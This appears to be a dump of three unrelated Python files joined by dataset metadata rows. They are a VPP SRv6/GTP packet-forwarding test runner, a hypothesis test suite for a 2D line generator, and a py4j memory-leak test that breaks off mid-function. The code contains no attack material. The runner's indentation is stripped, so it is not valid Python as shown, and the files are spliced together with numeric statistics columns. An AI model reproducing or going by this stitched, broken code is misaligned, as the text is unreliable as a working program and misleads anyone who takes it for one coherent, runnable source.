self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 1.0.0.1 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt4 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 1.0.0.1 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt4 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 B::2 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt6 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ipv6_pgroute("pg0", "B::2", "2002::1/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 B::2 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt6 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ipv6_pgroute("pg0", "B::2", "2002::1/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_dt(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c1.pg_create_interface6_name(
ifname="pg0",
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c1.pg_create_interface4_name(
ifname="pg1",
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.dt46 fib-table 0 local-fib-table 0")
c1.vppctl_exec("set ip neighbor pg1 1.0.0.1 aa:bb:cc:dd:ee:22")
c1.set_ip_pgroute("pg1", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c1.pg_start_capture_name(ifname="pg1")
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c1.name))
for p in c1.pg_read_packets():
p.show2()
def test_gtp4_dt(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c1.pg_create_interface4_name(
ifname="pg0",
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c1.pg_create_interface4_name(
ifname="pg1",
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.dt4 fib-table 0")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c1.vppctl_exec("set ip neighbor pg1 1.0.0.1 aa:bb:cc:dd:ee:22")
c1.set_ip_pgroute("pg1", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c1.pg_start_capture_name(ifname="pg1")
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c1.name))
for p in c1.pg_read_packets():
p.show2()
def status_containers(self):
print("Instances:")
for i, name in enumerate(self.instance_names):
name = self.get_name(name)
print("\t[{}] {} - {}".format(
i, name,
"running" if self.containers.get(name) else "missing"))
print("Networks:")
for i, name in enumerate(self.network_names):
name = self.get_name(name)
print("\t[{}] {} - {}".format(
i, name,
"running" if self.networks.get(name) else "missing"))
def build_image(self):
print("VPP Path (build): {}".format(self.vpp_path))
self.containers.build(self.path, self.vpp_path)
def release_image(self):
print("VPP Path (release): {}".format(self.vpp_path))
instance = self.containers.new("release-build")
system(
"docker cp release-build:{}/vpp-package.tgz {}/".format(
self.vpp_path, self.vpp_path))
instance.rem()
self.containers.release(self.path, self.vpp_path)
system("rm -rf {}/vpp-package.tgz".format(self.vpp_path))
def vppctl(self, index, command=None):
if index >= len(self.instance_names):
return
name = self.get_name(self.instance_names[index])
self.logger.error("connecting to: {}".format(name))
self.containers.vppctl(name, command)
def bash(self, index):
if index >= len(self.instance_names):
return
name = self.get_name(self.instance_names[index])
self.logger.error("connecting to: {}".format(name))
self.containers.bash(name)
def get_args():
parser = ArgumentParser()
parser.add_argument("--verbose", choices=['error', 'debug', 'info'])
parser.add_argument('--image', choices=['debug', 'release'])
subparsers = parser.add_subparsers()
p1 = subparsers.add_parser(
"infra", help="Infrastructure related commands.")
p1.add_argument(
"op",
choices=[
'stop',
'start',
'status',
'restart',
'build',
'release'])
p1.add_argument("--prefix")
p1.add_argument("--image")
p2 = subparsers.add_parser("cmd", help="Instance related commands.")
p2.add_argument("op", choices=['vppctl', 'bash'])
p2.add_argument(
"index",
type=int,
help="Container instance index. (./runner.py infra status)")
p2.add_argument(
"--command", help="Only vppctl supports this optional argument.")
p3 = subparsers.add_parser("test", help="Test related commands.")
p3.add_argument(
"op",
choices=[
"ping",
"srv6",
# "tmap",
# "tmap_5g",
# "tmap_ipv6",
# "tmap_ipv6_5g",
"gtp4",
"gtp4_usid",
"gtp4_5g",
"gtp4_echo",
"gtp4_reply",
"gtp4_error",
"gtp4_ipv6",
"gtp4_ipv6_5g",
"gtp6_drop_in",
"gtp6_drop_in_5g",
"gtp6_drop_in_echo",
"gtp6_drop_in_reply",
"gtp6_drop_in_error",
"gtp6_drop_in_ipv6",
"gtp6_drop_in_ipv6_5g",
"gtp6",
"gtp6_5g",
"gtp6_ipv6",
"gtp6_ipv6_5g",
"gtp6_dt",
"gtp4_dt"])
args = parser.parse_args()
if not hasattr(args, "op") or not args.op:
parser.print_help(sys.stderr)
sys.exit(1)
return vars(args)
def main(op=None, prefix=None, verbose=None,
image=None, index=None, command=None):
if verbose:
basicConfig(level=verbose_levels[verbose])
if image == 'release':
image = "srv6m-release-image"
elif image == 'debug':
image = "srv6m-image"
else:
image = "srv6m-image"
print("Target image: {}".format(image))
program = Program(image, prefix)
try:
if op == 'build':
program.build_image()
elif op == 'release':
program.release_image()
elif op == 'stop':
program.stop_containers()
elif op == 'start':
program.start_containers()
elif op == 'status':
program.status_containers()
elif op == 'vppctl':
program.vppctl(index, command)
elif op == 'bash':
program.bash(index)
elif op == 'ping':
program.test_ping()
elif op == 'srv6':
program.test_srv6()
# elif op == 'tmap':
# program.test_tmap()
# elif op == 'tmap_5g':
# program.test_tmap_5g()
# elif op == 'tmap_ipv6':
# program.test_tmap_ipv6()
# elif op == 'tmap_ipv6_5g':
# program.test_tmap_ipv6_5g()
elif op == 'gtp4':
program.test_gtp4()
elif op == 'gtp4_usid':
program.test_gtp4_usid()
elif op == 'gtp4_5g':
program.test_gtp4_5g()
elif op == 'gtp4_echo':
program.test_gtp4_echo()
elif op == 'gtp4_reply':
program.test_gtp4_reply()
elif op == 'gtp4_error':
program.test_gtp4_error()
elif op == 'gtp4_ipv6':
program.test_gtp4_ipv6()
elif op == 'gtp4_ipv6_5g':
program.test_gtp4_ipv6_5g()
elif op == 'gtp6_drop_in':
program.test_gtp6_drop_in()
elif op == 'gtp6_drop_in_5g':
program.test_gtp6_drop_in_5g()
elif op == 'gtp6_drop_in_echo':
program.test_gtp6_drop_in_echo()
elif op == 'gtp6_drop_in_reply':
program.test_gtp6_drop_in_reply()
elif op == 'gtp6_drop_in_error':
program.test_gtp6_drop_in_error()
elif op == 'gtp6_drop_in_ipv6':
program.test_gtp6_drop_in_ipv6()
elif op == 'gtp6_drop_in_ipv6_5g':
program.test_gtp6_drop_in_ipv6_5g()
elif op == 'gtp6':
program.test_gtp6()
elif op == 'gtp6_5g':
program.test_gtp6_5g()
elif op == 'gtp6_ipv6':
program.test_gtp6_ipv6()
elif op == 'gtp6_ipv6_5g':
program.test_gtp6_ipv6_5g()
elif op == 'gtp6_dt':
program.test_gtp6_dt()
elif op == 'gtp4_dt':
program.test_gtp4_dt()
except Exception:
program.logger.exception("")
rc = 1
else:
rc = 0
return rc
if __name__ == "__main__":
sys.exit(main(**get_args()))
| 32.552672
| 110
| 0.557019
| 12,347
| 84,051
| 3.635539
| 0.032721
| 0.045224
| 0.022723
| 0.030298
| 0.868762
| 0.850472
| 0.835145
| 0.82942
| 0.827883
| 0.825454
| 0
| 0.085557
| 0.284256
| 84,051
| 2,581
| 111
| 32.565285
| 0.660599
| 0.043831
| 0
| 0.755807
| 0
| 0.008161
| 0.235739
| 0.000753
| 0
| 0
| 0
| 0.000387
| 0.000628
| 1
| 0.052103
| false
| 0.001883
| 0.006905
| 0.008161
| 0.084118
| 0.072819
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c478170930724a811dfa7830ebef5b7b3e5c4760
| 3,938
|
py
|
Python
|
test/test_2d_line.py
|
BurnySc2/Python-Generators
|
428263db1e75fe54e4bdb90c39262c528b878388
|
[
"MIT"
] | null | null | null |
test/test_2d_line.py
|
BurnySc2/Python-Generators
|
428263db1e75fe54e4bdb90c39262c528b878388
|
[
"MIT"
] | null | null | null |
test/test_2d_line.py
|
BurnySc2/Python-Generators
|
428263db1e75fe54e4bdb90c39262c528b878388
|
[
"MIT"
] | null | null | null |
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import math
from hypothesis import given, settings, strategies as st
from generators_2d.generators import generate_2d_line
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=100, max_value=10 ** 5),
st.integers(min_value=-100, max_value=100),
)
def test_lines_towards_east(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (y1 - y0) / abs(x1 - x0)
y_new = y0
for x in range(x0, x1 + 1):
correct_result.append((x, math.floor(y_new)))
y_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=-100),
st.integers(min_value=-100, max_value=100),
)
def test_lines_towards_west(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (y1 - y0) / abs(x1 - x0)
y_new = y0
for x in range(x0, x1 - 1, -1):
correct_result.append((x, math.floor(y_new)))
y_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-100, max_value=-100),
st.integers(min_value=101, max_value=10 ** 5),
)
def test_lines_towards_north(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (x1 - x0) / abs(y1 - y0)
x_new = x0
for y in range(y0, y1 + 1):
correct_result.append((math.floor(x_new), y))
x_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-100, max_value=-100),
st.integers(min_value=-10 ** 5, max_value=-101),
)
def test_lines_towards_south(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (x1 - x0) / abs(y1 - y0)
x_new = x0
for y in range(y0, y1 - 1, -1):
correct_result.append((math.floor(x_new), y))
x_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
def test_simple_line_examples():
# No line, start and end point are identical, dont divide by zero
a = list(generate_2d_line(0, 0, 0, 0))
assert a == [(0, 0)]
# 2 examples to check vertical and horizontal
a = list(generate_2d_line(0, 0, 1, 0))
assert a == [(0, 0), (1, 0)]
a = list(generate_2d_line(0, 0, 0, 1))
assert a == [(0, 0), (0, 1)]
# 3 examples to check diagonal
a = list(generate_2d_line(0, 0, 1, 1))
assert a == [(0, 0), (1, 1)]
a = list(generate_2d_line(-1, -1, 1, 1))
assert a == [(-1, -1), (0, 0), (1, 1)]
a = list(generate_2d_line(-1, 1, 1, -1))
assert a == [(-1, 1), (0, 0), (1, -1)]
# Point2 is mostly to the right of point1
a = list(generate_2d_line(0, 0, 4, 2))
b = [(0, 0), (1, 0), (2, 1), (3, 1), (4, 2)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the left of point1
a = list(generate_2d_line(4, 2, 0, 0))
b = [(4, 2), (3, 1), (2, 1), (1, 0), (0, 0)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the top of point1
a = list(generate_2d_line(0, 0, 2, 4))
b = [(0, 0), (0, 1), (1, 2), (1, 3), (2, 4)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the bottom of point1
a = list(generate_2d_line(2, 4, 0, 0))
b = [(2, 4), (1, 3), (1, 2), (0, 1), (0, 0)]
assert a == b, f"{a}\n{b}"
| 29.609023
| 69
| 0.584053
| 682
| 3,938
| 3.205279
| 0.133431
| 0.021958
| 0.073193
| 0.131747
| 0.801006
| 0.774016
| 0.774016
| 0.747941
| 0.702653
| 0.668801
| 0
| 0.100633
| 0.237938
| 3,938
| 132
| 70
| 29.833333
| 0.627791
| 0.074657
| 0
| 0.553191
| 1
| 0
| 0.009351
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 1
| 0.053191
| false
| 0
| 0.042553
| 0
| 0.095745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
672ce002de690c0f9465a092c53d7a026be83156
| 31,029
|
py
|
Python
|
py4j-python/src/py4j/tests/memory_leak_test.py
|
dHannasch/py4j
|
21f17f9e723729433f5f1abcf79482c1efb2ff89
|
[
"BSD-3-Clause"
] | 3,301
|
2018-10-01T16:30:44.000Z
|
2022-03-30T08:07:16.000Z
|
py4j-python/src/py4j/tests/memory_leak_test.py
|
dHannasch/py4j
|
21f17f9e723729433f5f1abcf79482c1efb2ff89
|
[
"BSD-3-Clause"
] | 308
|
2015-01-08T00:29:52.000Z
|
2022-02-16T02:31:17.000Z
|
py4j-python/src/py4j/tests/memory_leak_test.py
|
dHannasch/py4j
|
21f17f9e723729433f5f1abcf79482c1efb2ff89
|
[
"BSD-3-Clause"
] | 765
|
2018-10-09T02:02:19.000Z
|
2022-03-31T12:06:21.000Z
|
# -*- coding: UTF-8 -*-
from contextlib import contextmanager
import gc
from multiprocessing import Process
import subprocess
import unittest
from py4j.java_gateway import (
JavaGateway, GatewayParameters, CallbackServerParameters,
DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT)
from py4j.clientserver import (
ClientServer, JavaParameters, PythonParameters)
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, check_connection, sleep)
from py4j.tests.py4j_callback_recursive_example import HelloState
from py4j.tests.instrumented import (
InstrJavaGateway, InstrumentedPythonPing, register_creation,
CREATED, FINALIZED, MEMORY_HOOKS, InstrClientServer)
def start_instrumented_gateway_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.instrumented.InstrumentedApplication"])
def start_instrumented_clientserver():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.instrumented.InstrumentedClientServerApplication"])
def start_gateway_server_example_app_process(start_gateway_server=True):
# XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
if start_gateway_server:
p = Process(target=start_instrumented_gateway_server)
else:
p = Process(target=start_instrumented_clientserver)
p.start()
sleep()
check_connection()
return p
@contextmanager
def gateway_server_example_app_process(start_gateway_server=True):
p = start_gateway_server_example_app_process(start_gateway_server)
try:
yield p
finally:
p.join()
class HelloState2(HelloState):
def __init__(self, run_gc=True):
self.gateway = None
self.run_gc = run_gc
super(HelloState2, self).__init__()
register_creation(self)
def _play_with_jvm(self):
al = self.gateway.jvm.java.util.ArrayList()
al.append("Hello World")
obj = self.gateway.jvm.py4j.\
instrumented.InstrumentedObject("test")
al.append(obj)
return str(al)
def sayHello(self, int_value=None, string_value=None):
self._play_with_jvm()
if self.run_gc:
python_gc()
return super(HelloState2, self).sayHello(
int_value, string_value)
class Java:
implements = ["py4j.examples.IHello"]
def assert_python_memory(test, size):
test.assertEqual(size, len(CREATED))
test.assertEqual(size, len(FINALIZED))
test.assertEqual(set(CREATED), set(FINALIZED))
def python_gc():
"""Runs the gc three times to ensure that all circular reference are
correctly removed.
"""
for i in range(3):
gc.collect()
class GatewayServerTest(unittest.TestCase):
def tearDown(self):
MEMORY_HOOKS.clear()
CREATED.clear()
FINALIZED.clear()
def testPythonToJava(self):
def work_with_object(gateway):
obj = gateway.jvm.py4j.\
instrumented.InstrumentedObject("test")
return str(obj)
def internal_work():
gateway2 = InstrJavaGateway(gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5))
sleep()
work_with_object(gateway2)
python_gc()
sleep()
gateway2.shutdown()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
internal_work()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 4 objects: GatewayServer, GatewayConnection, CallbackClient,
# InstrumentedObject
self.assertEqual(4, len(createdSet))
self.assertEqual(4, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 4 objects: JavaGateway, GatewayClient, GatewayProperty,
# GatewayConnection
assert_python_memory(self, 4)
def testPythonToJavaToPython(self):
def play_with_ping(gateway):
ping = InstrumentedPythonPing()
pingpong = gateway.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work():
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(gateway2)
python_gc()
sleep()
gateway2.shutdown()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
internal_work()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 9 objects: GatewayServer, 4 GatewayConnection, CallbackClient,
# 3 CallbackConnection
self.assertEqual(9, len(createdSet))
self.assertEqual(9, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 11 objects: JavaGateway, CallbackSerer, GatewayClient,
# GatewayProperty, PythonPing, 4 GatewayConnection,
# 3 CallbackConnection. Notice the symmetry
assert_python_memory(self, 12)
def testPythonToJavaToPythonClose(self):
def play_with_ping(gateway):
ping = InstrumentedPythonPing()
pingpong = gateway.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work(assert_memory):
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(gateway2)
python_gc()
sleep()
gateway2.close(close_callback_server_connections=True,
keep_callback_server=True)
sleep()
assert_memory()
gateway2.shutdown()
sleep()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
def perform_memory_tests():
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 10 objects: GatewayServer, 4 GatewayConnection,
# CallbackClient, 4 CallbackConnection
self.assertEqual(10, len(createdSet))
# 13 objects: JavaGateway, CallbackSerer, GatewayClient,
# GatewayProperty, PythonPing, 4 GatewayConnection,
# 4 CallbackConnection. Notice the symmetry between callback
# and gateway connections.
self.assertEqual(13, len(CREATED))
# 4 gateway connections, 3 callback connections.
# There is still one callback connection staying around
# following Java finalization that called back Python.
self.assertEqual(7, len(finalizedSet))
# Same amount of connections for the Python side
self.assertEqual(7, len(FINALIZED))
internal_work(perform_memory_tests)
python_gc()
